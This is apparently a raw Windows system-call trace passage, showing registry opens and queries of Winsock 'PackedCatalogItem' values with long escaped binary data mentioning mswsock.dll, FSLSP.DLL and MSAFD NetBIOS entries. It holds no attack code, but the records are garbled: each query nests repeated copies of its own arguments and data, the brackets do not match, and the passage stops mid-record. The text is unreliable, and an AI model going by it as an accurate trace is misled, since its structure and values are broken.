 03626   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\356\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0.\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\356\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0.\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0.\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\356\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0+\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0,\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0-\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0.\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03627   456   NtClose  (480, ... ) == 0x0
 03628   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000007"}, ... 480, ) }, ... 480, ) == 0x0
 03629   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03630   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03631   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\357\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\357\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\357\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\04\0F\0E\05\07\0D\07\0B\0-\00\03\0A\05\0-\04\08\0B\02\0-\08\0\0\0\0\0\204\3\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\00\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\01\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\02\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03632   456   NtClose  (480, ... ) == 0x0
 03633   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000008"}, ... 480, ) }, ... 480, ) == 0x0
 03634   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03635   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03636   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\360\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\360\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\360\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 